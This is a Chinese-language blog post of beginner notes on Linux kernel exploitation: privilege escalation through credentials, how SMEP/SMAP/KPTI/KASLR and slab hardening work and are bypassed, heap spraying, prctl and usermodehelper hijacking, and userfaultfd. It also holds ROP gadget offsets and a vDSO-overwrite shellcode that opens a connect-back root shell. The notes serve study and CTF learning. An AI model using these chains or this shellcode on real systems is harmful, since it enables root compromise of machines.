Linux Kernel Exploit 入门笔记

笔者kernel pwn入门时的笔记,由于笔者接触kernel时间较短,难免出现错误….

Aim

int commit_creds(struct cred *new) 更改进程的cred.

commit_creds(prepare_kernel_cred(NULL));完成权限提升

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
/*
 * Per-task credentials record (excerpt as quoted in these notes): the
 * real/saved/effective/filesystem UIDs and GIDs, the capability sets, and,
 * depending on the CONFIG_* options below, debug bookkeeping, keyrings and
 * an LSM pointer, followed by user/namespace/group references.
 *
 * NOTE(review): the init_cred initializer quoted later in this document sets
 * .ucounts, which is not declared in this excerpt -- the two snippets appear
 * to come from different kernel versions; confirm against the target kernel.
 */
struct cred {
atomic_t usage; /* presumably the reference count -- TODO confirm */
#ifdef CONFIG_DEBUG_CREDENTIALS
atomic_t subscribers; /* number of processes subscribed */
void *put_addr;
unsigned magic;
#define CRED_MAGIC 0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
kuid_t uid; /* real UID of the task */
kgid_t gid; /* real GID of the task */
kuid_t suid; /* saved UID of the task */
kgid_t sgid; /* saved GID of the task */
kuid_t euid; /* effective UID of the task */
kgid_t egid; /* effective GID of the task */
kuid_t fsuid; /* UID for VFS ops */
kgid_t fsgid; /* GID for VFS ops */
unsigned securebits; /* SUID-less security management */
kernel_cap_t cap_inheritable; /* caps our children can inherit */
kernel_cap_t cap_permitted; /* caps we're permitted */
kernel_cap_t cap_effective; /* caps we can actually use */
kernel_cap_t cap_bset; /* capability bounding set */
kernel_cap_t cap_ambient; /* Ambient capability set */
#ifdef CONFIG_KEYS
unsigned char jit_keyring; /* default keyring to attach requested
* keys to */
struct key *session_keyring; /* keyring inherited over fork */
struct key *process_keyring; /* keyring private to this process */
struct key *thread_keyring; /* keyring private to this thread */
struct key *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
void *security; /* subjective LSM security */
#endif
struct user_struct *user; /* real user ID subscription */
struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
struct group_info *group_info; /* supplementary groups for euid/fsgid */
/* RCU deletion */
union {
int non_rcu; /* Can we skip RCU deletion? */
struct rcu_head rcu; /* RCU deletion hook */
};
/* NOTE(review): __randomize_layout suggests field order may differ per build -- do not rely on fixed offsets without checking the target */
} __randomize_layout;
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
/*
 * The initial credentials for the initial task
 *
 * Every UID/GID slot (real, saved, effective, filesystem) is the global root
 * ID. The permitted, effective and bounding capability sets are full, while
 * the inheritable set is empty. Members not named in this initializer are
 * zero-initialized, as with any C designated initializer.
 */
struct cred init_cred = {
.usage = ATOMIC_INIT(4),
#ifdef CONFIG_DEBUG_CREDENTIALS
.subscribers = ATOMIC_INIT(2),
.magic = CRED_MAGIC,
#endif
/* all identity fields are root */
.uid = GLOBAL_ROOT_UID,
.gid = GLOBAL_ROOT_GID,
.suid = GLOBAL_ROOT_UID,
.sgid = GLOBAL_ROOT_GID,
.euid = GLOBAL_ROOT_UID,
.egid = GLOBAL_ROOT_GID,
.fsuid = GLOBAL_ROOT_UID,
.fsgid = GLOBAL_ROOT_GID,
.securebits = SECUREBITS_DEFAULT,
/* nothing inheritable, everything permitted/effective/bounding */
.cap_inheritable = CAP_EMPTY_SET,
.cap_permitted = CAP_FULL_SET,
.cap_effective = CAP_FULL_SET,
.cap_bset = CAP_FULL_SET,
.user = INIT_USER,
.user_ns = &init_user_ns,
.group_info = &init_groups,
.ucounts = &init_ucounts,
};

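Linux 6.2起,prepare_kernel_cred(NULL)不再以init_cred为模板(传NULL会直接返回NULL),因此commit_creds(prepare_kernel_cred(NULL))失效;需要改用commit_creds(&init_cred)或prepare_kernel_cred(&init_task).下面是6.2之前的实现: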

1
2
3
4
5
6
7
8
9
/*
 * Excerpt ("..." marks elided code): selects the credentials to start from.
 * A non-NULL @daemon supplies its own task credentials via get_task_cred();
 * a NULL @daemon falls back to init_cred via get_cred().
 */
struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
...
if (daemon)
old = get_task_cred(daemon);
else
old = get_cred(&init_cred);
...
}

Defense and bypass

SMEP/SMAP

https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-3a-part-1-manual.pdf?ref=hackernoon.com 4.6.1

用户空间代码无法执行/用户空间地址无法访问
两种保护分别通过CR4寄存器的第20位(SMEP)和第21位(SMAP)使能.在CR4 pinning补丁合入之前能关,用native_write_cr4(value)把对应位清零就行;之后这两位被固定了(下面的报道写的是5.1周期,主线实际合入应为5.3,以目标内核源码为准).
https://www.phoronix.com/news/Linux-Protect-Special-CR4-Bits

With a new patch now pending in the tip tree ahead of the Linux 5.1 kernel cycle, the bits for SMEP and SMAP as well as UMIP are pinned so they can no longer be easily altered. UMIP meanwhile is the User-Mode Instruction Prevention feature to prevent execution of certain instructions in higher privilege levels and its behavior too is controlled via a CR4 bit.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
/*
 * Write @val to CR4, restoring the pinned bits if the write changed them.
 *
 * The register is written first and checked afterwards: when cr_pinning is
 * enabled and the bits selected by cr4_pinned_mask differ from
 * cr4_pinned_bits, the differing bits are recorded, @val is patched so the
 * pinned bits hold their required values, and the write is repeated. Once
 * the value is consistent, a one-time warning reports which bits had been
 * changed.
 */
void native_write_cr4(unsigned long val)
{
unsigned long bits_changed = 0; /* pinned bits that the requested value altered */

set_register:
/* "+r" makes val a read-write operand of the mov into CR4 */
asm volatile("mov %0,%%cr4": "+r" (val) : : "memory");

if (static_branch_likely(&cr_pinning)) {
if (unlikely((val & cr4_pinned_mask) != cr4_pinned_bits)) {
/* remember what differed, force the pinned bits back, and rewrite CR4 */
bits_changed = (val & cr4_pinned_mask) ^ cr4_pinned_bits;
val = (val & ~cr4_pinned_mask) | cr4_pinned_bits;
goto set_register;
}
/* Warn after we've corrected the changed bits. */
WARN_ONCE(bits_changed, "pinned CR4 bits changed: 0x%lx!?\n",
bits_changed);
}
}

W/R (bit 1).
If the access causing the page-fault exception was a write, this flag is 1; otherwise, it is 0. This flag describes
the access causing the page-fault exception, not the access rights specified by paging.

U/S (bit 2)
If a user-mode access caused the page-fault exception, this flag is 1; it is 0 if a supervisor-mode access did so.
This flag describes the access causing the page-fault exception, not the access rights specified by paging.

If the U/S flag (bit 2) is 0 in at least one of the paging-structure
entries, the address is a supervisor-mode address. Otherwise, the address is a user-mode address.

I/D flag (bit 4).
This flag is 1 if (1) the access causing the page-fault exception was an instruction fetch; and (2) either
(a) CR4.SMEP = 1; or (b) both (i) CR4.PAE = 1 (either PAE paging or IA-32e paging is in use); and
(ii) IA32_EFER.NXE = 1. Otherwise, the flag is 0. This flag describes the access causing the page-fault
exception, not the access rights specified by paging

SMEP

管理模式执行保护:CR4.SMEP置位后,CPU在内核态(supervisor mode)取指时,如果目标页是用户态页面(各级页表项U/S均为1)就会触发page fault,并不需要改动页表.防止直接修改返回地址到用户空间.可以在内核栈上ROP来绕过,溢出长度不够就栈迁移到用户空间(只开SMEP时内核仍能读写用户内存).

重新映射页面权限是绕不了的:

我说它是内核地址不就绕了?不过感觉没啥实际意义

SMAP

管理模式访问保护:CR4.SMAP置位后,内核态对用户态页面(U/S=1)的数据读写会触发page fault(除非EFLAGS.AC=1),那就纯内核栈上ROP或者内核空间内栈迁移.

STAC一下能绕.

CR4.SMAP allows pages to be protected from supervisor-mode data accesses. If CR4.SMAP = 1, software operating
in supervisor mode cannot access data at linear addresses that are accessible in user mode. Software can override
this protection by setting EFLAGS.AC. Section 4.6 explains how access rights are determined, including the defini-
tion of supervisor-mode accesses and user-mode accessibility

可惜没有STAC的gadget,手动改CR4的SMAP的ROP链长度和提权差别不大了,没意义

KPTI

内核页表隔离.内核页表中有完整的用户地址空间和内核地址空间,用户页表中有完整的用户地址空间和a minimal set of kernel space address(异常处理入口点啥的).
防止一些侧信道的攻击手法泄露内核信息.同时KPTI在内核页表中将用户空间映射为不可执行.这意味着如果不切换页表就直接返回用户态(CR3仍指向内核页表),执行用户代码时会触发用户级的SIGSEGV.

可以修改页表权限,切换回用户页表,注册用户级signal处理函数来正常返回用户态执行代码.
切换回用户页表:

1
2
3
mov     rdi, cr3
or rdi, 1000h
mov cr3, rdi

或者用现成的swapgs_restore_regs_and_return_to_usermode+22,布置好iret的frame就行

1
2
3
4
5
6
7
8
9
10
.text:FFFFFFFF81200F26                 mov     rdi, rsp
.text:FFFFFFFF81200F29 mov rsp, qword ptr gs:unk_6004
.text:FFFFFFFF81200F32 push qword ptr [rdi+30h]
.text:FFFFFFFF81200F35 push qword ptr [rdi+28h]
.text:FFFFFFFF81200F38 push qword ptr [rdi+20h]
.text:FFFFFFFF81200F3B push qword ptr [rdi+18h]
.text:FFFFFFFF81200F3E push qword ptr [rdi+10h]
.text:FFFFFFFF81200F41 push qword ptr [rdi]
.text:FFFFFFFF81200F43 push rax
.text:FFFFFFFF81200F44 jmp short loc_FFFFFFFF81200F89
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
.text:FFFFFFFF81200F89 loc_FFFFFFFF81200F89:
.text:FFFFFFFF81200F89 pop rax
.text:FFFFFFFF81200F8A pop rdi
.text:FFFFFFFF81200F8B call cs:off_FFFFFFFF82040088
.text:FFFFFFFF81200F91 jmp cs:off_FFFFFFFF82040080
...
.text.native_swapgs:FFFFFFFF8146D4E0 push rbp
.text.native_swapgs:FFFFFFFF8146D4E1 mov rbp, rsp
.text.native_swapgs:FFFFFFFF8146D4E4 swapgs
.text.native_swapgs:FFFFFFFF8146D4E7 pop rbp
.text.native_swapgs:FFFFFFFF8146D4E8 retn
...
.text:FFFFFFFF8120102E mov rdi, cr3
.text:FFFFFFFF81201031 jmp short loc_FFFFFFFF81201067
...
.text:FFFFFFFF81201067 or rdi, 1000h
.text:FFFFFFFF8120106E mov cr3, rdi
...
.text:FFFFFFFF81200FC7 iretq

swapgs作用
(ps: x86-64 架构下glibc使用FS来寻址TLS,GS不使用)

KASLR/FG-KASLR

内核地址空间布局随机化.泄露个地址算基址就能绕.
FG-KASLR使偏移也随机化了,但是有不变的.
[text,text+0x400dc6] 可以找点gadget
swapgs_restore_regs_and_return_to_usermode 不变,可以正常返回用户态
ksymtab, starts at text+0xf85198 不变,可以找到commit_creds prepare_kernel_cred的地址.

构造个任意读即可:

1
2
3
4
/*
 * ROP gadget addresses, each a fixed offset from image_base; the trailing
 * comment gives the instruction sequence expected at that address.
 */
unsigned long pop_rax_ret = image_base + 0x4d11UL; // pop rax; ret
/*
 * NOTE(review): "mov eax, qword ptr" pairs a 32-bit register with a 64-bit
 * operand size -- probably a disassembler output quirk; confirm the real
 * load width before relying on the upper 32 bits of the result.
 */
unsigned long read_mem_pop1_ret = image_base + 0x4aaeUL; // mov eax, qword ptr [rax + 0x10]; pop rbp; ret;
unsigned long pop_rdi_rbp_ret = image_base + 0x38a0UL; // pop rdi; pop rbp; ret;

1
2
3
4
5
/*
 * Symbol-table entry made of three int offsets rather than pointers.
 * NOTE(review): presumably each offset is relative to the address of the
 * field that holds it (address = &field + field) -- confirm against the
 * kernel's export headers for the target version.
 */
struct kernel_symbol {
int value_offset; /* offset leading to the symbol's value -- TODO confirm base */
int name_offset; /* offset leading to the symbol's name -- TODO confirm base */
int namespace_offset; /* offset leading to the symbol's namespace -- TODO confirm base */
};

SLAB_ACCOUNT

Linux 4.5版本引入,cred结构体由单独的kmem_cache分配

GFP_KERNEL_ACCOUNT

CONFIG_SLAB_FREELIST_RANDOM

开启后,每次新分配一个slab时都会把其中空闲对象的freelist顺序随机打乱.
slab在未开启random freelist时,是从高地址开始取堆块的. https://lwn.net/Articles/685047/
slub在未开启random freelist时,是从低地址开始取堆块的

CONFIG_SLAB_FREELIST_HARDENED

代码来自 Linux5.11.1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
/* Excerpt: only the freelist-hardening member is shown; "..." marks elided content. */
struct kmem_cache
{
...
#ifdef CONFIG_SLAB_FREELIST_HARDENED
unsigned long random; /* mixed into freelist pointers by freelist_ptr() as s->random */
...
}

/*
 * Transform a freelist pointer for storage or retrieval.
 *
 * With CONFIG_SLAB_FREELIST_HARDENED the result is
 *     ptr ^ s->random ^ swab(ptr_addr with its KASAN tag reset)
 * The transform is a pure XOR with values that do not depend on @ptr, so
 * applying it to its own output (same @s and @ptr_addr) gives back the
 * original pointer. Without the option, @ptr is returned unchanged.
 *
 * @s:        cache whose ->random value is mixed in
 * @ptr:      pointer value to transform
 * @ptr_addr: presumably the address where the pointer is stored -- the name
 *            and the comment below suggest this; confirm against callers
 */
static inline void *freelist_ptr(const struct kmem_cache *s, void *ptr,
unsigned long ptr_addr)
{
#ifdef CONFIG_SLAB_FREELIST_HARDENED
/*
* When CONFIG_KASAN_SW/HW_TAGS is enabled, ptr_addr might be tagged.
* Normally, this doesn't cause any issues, as both set_freepointer()
* and get_freepointer() are called with a pointer with the same tag.
* However, there are some issues with CONFIG_SLUB_DEBUG code. For
* example, when __free_slub() iterates over objects in a cache, it
* passes untagged pointers to check_object(). check_object() in turns
* calls get_freepointer() with an untagged pointer, which causes the
* freepointer to be restored incorrectly.
*/
/* tag is stripped from ptr_addr before mixing so tagged and untagged callers agree */
return (void *)((unsigned long)ptr ^ s->random ^
swab((unsigned long)kasan_reset_tag((void *)ptr_addr)));
#else
return ptr;
#endif
}

Hardened Usercopy

Each call involves a user-space pointer and a kernel-space pointer; the user-space pointers are already checked in current kernels, so the patches only add tests for the kernel-space pointers. Those tests ensure that the address range doesn’t wrap past the end of memory, that the kernel-space pointer is not null, and that it does not point to a zero-length kmalloc() allocation (i.e. ZERO_OR_NULL_PTR() is false). Also, if the address range overlaps the kernel text (code) segment, it is rejected.

Beyond that, if the kernel-space address points into an object that has been allocated from the slab allocator, the patches ensure that what is being copied fits within the size of the object allocated. This check is performed by calling PageSlab() on the kernel address to see if it lies within a page that is handled by the slab allocator; it then calls an allocator-specific routine to determine whether the amount of data to be copied is fully within an allocated object. If the address range is not handled by the slab allocator, the patches will test that it is either within a single or compound page and that it does not span independently allocated pages.

In addition, for copies involving the stack, the copied range must fit within the current process’s stack. If there is architecture support for identifying stack frames, the copied range must fit within a single frame.

总结一下就是:

  1. 地址范围不能越过内存边界(wrap past the end of memory)
  2. 内核空间指针不为NULL
  3. 不允许指向 kmalloc 分配的零长度区域
  4. 地址范围不能与.text段重合
  5. 如果地址范围由slab管理,则地址范围需符合分配对象的大小
  6. (接5)否则地址范围不能跨越独立分配的页面.
  7. 如果涉及到栈则不允许超出当前进程的栈空间

以及一个副作用:

If usersize is non-zero (i.e., the cache is user-space accessible), this cache is not merged with any other cache on the system.This is a major downside from the exploitation perspective since all general-purpose caches are now marked as user-space accessible in create_boot_cache() where useroffset is set to 0 and usersize is the entire cache/object size. As a result, general-purpose caches are no longer mergeable with special-purpose caches. This is true even if CONFIG_HARDENED_USERCOPY is disabled!

总结

Technique

从内存任意读写到权限提升

堆喷射(Heap Spray)

固定堆布局

假设现在有一个堆溢出,但你目标要覆盖的对象不一定会分配到与能够发生溢出的对象前向(高地址)相邻的位置.(由于内核堆操作freelist杂乱或是开启了SLAB_FREELIST_RANDOM保护(默认开启)).
ps: 前提在同一个cache中

堆喷射:
先大量分配(spray)目标对象,清空原freelist(可选,个人见解).
分配发生溢出的对象.
大量喷射目标对象,使得目标对象并排放置,且有一个目标对象与发生溢出对象前向相邻.
最后正常溢出覆盖目标对象.

比如不断fork出新的进程,喷射cred结构再溢出覆盖完成提权(当然现在行不通了).
如何找到cred结构?PR_SET_NAME设置字符串,再在direct映射区搜索内存

1
2
3
4
PR_SET_NAME (since Linux 2.6.9)
Set the name of the calling thread, using the value in the location pointed to by (char *) arg2. The name can be up to 16 bytes long, including the terminating null byte. (If the
length of the string, including the terminating null byte, exceeds 16 bytes, the string is silently truncated.) This is the same attribute that can be set via pthread_setname_np(3)
and retrieved using pthread_getname_np(3). The attribute is likewise accessible via /proc/self/task/[tid]/comm, where tid is the thread ID of the calling thread.

HijackPrctl

《New Reliable Android Kernel Root Exploitation Techniques》

一个内核的hook,且用户态可完整控制参数.
注意第一个参数是个int类型,可能不能完整传递64位数据.

1
2
SYSCALL_DEFINE5(prctl, int, option, unsigned long, arg2, unsigned long, arg3,
unsigned long, arg4, unsigned long, arg5)

这种漏洞利用的原理在dong-hoon you(x86)分享的《New Reliable Android Kernel Root Exploitation Techniques》中提到,这种技术被用于安卓root,可以绕过PXN防御。

首先在用户执行prctl函数时,实际上是将全部参数传递给security_task_prctl函数(\kernel\sys.c 2075)

而security_task_prctl(\security\security.c)中通过hp->hook.task_prctl(option, arg2, arg3, arg4, arg5);将参数原封不动地传入hook进行处理,而这个hook位于内核的data段上,内核态有读写权限,因此可以通过修改这个位置劫持prctl函数的执行流程:

call_usermodehelper

《New Reliable Android Kernel Root Exploitation Techniques》

1
int call_usermodehelper(char * path, char ** argv, char ** envp, int wait); 

call_usermodehelper,这个函数可以在内核中直接新建和运行用户空间程序,并且该程序具有root权限,因此只要将参数传递正确就可以执行任意命令(注意命令中的参数要用全路径,不能用相对路径)。

由于prctl第一个参数(int)会被截断到32位,只能传递4字节的用户态地址,在开启了SMAP的情况下需要通过这样的链子.

  1. mce_do_trigger –> call_usermodehelper
  2. poweroff_work_func –> run_cmd(poweroff_cmd) –> call_usermodehelper

提权变量总结

call_usermodehelper提权路径变量总结

userfaultfd

从强网杯 2021 线上赛题目 notebook 中浅析 userfaultfd 在 kernel pwn 中的利用
该技术主要用于条件竞争的控制,本质是利用错误处理来控制条件竞争的时序.linux5.11后需要root才能启用.可用FUSE达到相同效果.

比如这样一个条件竞争完成稳定uaf:
一个线程通过blob_get取得对象的读机会,在读的时候触发pagefault,进入错误处理,错误处理线程调用blob_del删除此对象,利用喷射完成堆布局,这个对象现在是一个tty结构,最后恢复执行,blob_get读取到tty结构

vDSO

《Bypassing SMEP Using vDSO Overwrites》

vDSO是虚拟的共享库,实际上是把内核地址空间的某代码段映射到用户空间,修改其中的导出函数如:

clock_gettime 0000000000000A10
gettimeofday 0000000000000C80
time 0000000000000DE0
getcpu 0000000000000E00
start 0000000000000940 [main entry]

可劫持调用代码的root或suid进程,完成提权(其实本来就是root,只是弹个shell)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
https://gist.github.com/itsZN/1ab36391d1849f15b785
"\x90\x53\x48\x31\xc0\xb0\x66\x0f\x05\x48\x31\xdb\x48\x39\xc3\x75\x0f\x48\x31\xc0\xb0\x39\x0f\x05\x48\x31\xdb\x48\x39\xd8\x74\x09\x5b\x48\x31\xc0\xb0\x60\x0f\x05\xc3\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x97\x50\x48\xb9\xfd\xff\xf2\xfa\x80\xff\xff\xfe\x48\xf7\xd1\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x48\x31\xdb\x48\x39\xd8\x74\x07\x48\x31\xc0\xb0\xe7\x0f\x05\x90\x6a\x03\x5e\x6a\x21\x58\x48\xff\xce\x0f\x05\x75\xf6\x48\xbb\xd0\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xd3\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05\x48\x31\xc0\xb0\xe7\x0f\x05";


nop
push rbx
xor rax,rax
mov al, 0x66
syscall #check uid
xor rbx,rbx
cmp rbx,rax
jne emulate

xor rax,rax
mov al,0x39
syscall #fork
xor rbx,rbx
cmp rax,rbx
je connectback

emulate:
pop rbx
xor rax,rax
mov al,0x60
syscall
retq

connectback:
xor rdx,rdx
pushq 0x1
pop rsi
pushq 0x2
pop rdi
pushq 0x29
pop rax
syscall #socket

xchg rdi,rax
push rax
mov rcx, 0xfeffff80faf2fffd
not rcx
push rcx
mov rsi,rsp
pushq 0x10
pop rdx
pushq 0x2a
pop rax
syscall #connect

xor rbx,rbx
cmp rax,rbx
je sh
xor rax,rax
mov al,0xe7
syscall #exit

sh:
nop
pushq 0x3
pop rsi
duploop:
pushq 0x21
pop rax
dec rsi
syscall #dup
jne duploop

mov rbx,0xff978cd091969dd0
not rbx
push rbx
mov rdi,rsp
push rax
push rdi
mov rsi,rsp
xor rdx,rdx
mov al,0x3b
syscall #execve
xor rax,rax
mov al,0xe7
syscall

参考文章,引文,图片来源

感谢各位师傅的文章,侵删
https://xz.aliyun.com/t/6296
https://xz.aliyun.com/t/3204
https://www.jianshu.com/p/07994f8b2bb0
https://www.jianshu.com/p/a2259cd3e79e
https://www.anquanke.com/post/id/253835

  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!
  • Copyrights © 2022-2024 翰青HanQi

请我喝杯咖啡吧~

支付宝
微信